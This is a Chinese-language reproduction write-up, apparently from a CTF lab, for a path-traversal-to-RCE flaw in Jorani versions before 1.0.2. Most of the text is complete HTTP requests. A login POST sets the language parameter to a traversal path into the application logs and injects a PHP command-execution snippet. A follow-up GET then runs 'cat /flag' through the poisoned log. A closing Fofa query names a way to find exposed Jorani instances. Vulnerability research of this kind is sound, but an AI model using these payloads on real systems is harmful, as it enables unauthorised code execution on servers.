一、漏洞概述
Jorani是一款开源的员工考勤和休假管理系统,适用于中小型企业和全球化组织,它简化了员工工时记录、休假请求和审批流程,并提供了多语言支持以满足不同地区的需求。在 Jorani 1.0.0 中,攻击者可以利用路径遍历来访问文件并在服务器上执行代码。
二、影响范围
Jorani < 1.0.2
三、访问页面
四、漏洞复现
1、访问/session/login,获得Set-Cookie: csrf_cookie_jorani和Set-Cookie: jorani_session
GET /session/login HTTP/1.1
Host: eci-2zehn1b8g44tqrkz56kg.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
2、构造payload上传RCE参数,此处要填写上一步获取到的Set-Cookie: csrf_cookie_jorani和Set-Cookie: jorani_session。
POST /session/login HTTP/1.1
Host: eci-2zehn1b8g44tqrkz56kg.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: csrf_cookie_jorani=021fab46cda69d5d44c0691703f7bb01; jorani_session=d3f7b884860f3646e8bcef1f40d315009cf7fb80; language=zh
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 162
csrf_test_jorani=021fab46cda69d5d44c0691703f7bb01&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<%3f%3d`$_GET[cmd]`%3f>&CipheredValue=test
3、执行RCE命令cmd=cat%20/flag获得flag,同样的要填写第一步获取到的Set-Cookie: csrf_cookie_jorani和Set-Cookie: jorani_session
GET /pages/view/log-2024-07-23?cmd=cat%20/flag HTTP/1.1
Host: eci-2zehn1b8g44tqrkz56kg.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?
X-REQUESTED-WITH: XMLHttpRequest
Cookie: csrf_cookie_jorani=021fab46cda69d5d44c0691703f7bb01; jorani_session=d3f7b884860f3646e8bcef1f40d315009cf7fb80;
五、漏洞利用
Fofa: title=“Jorani”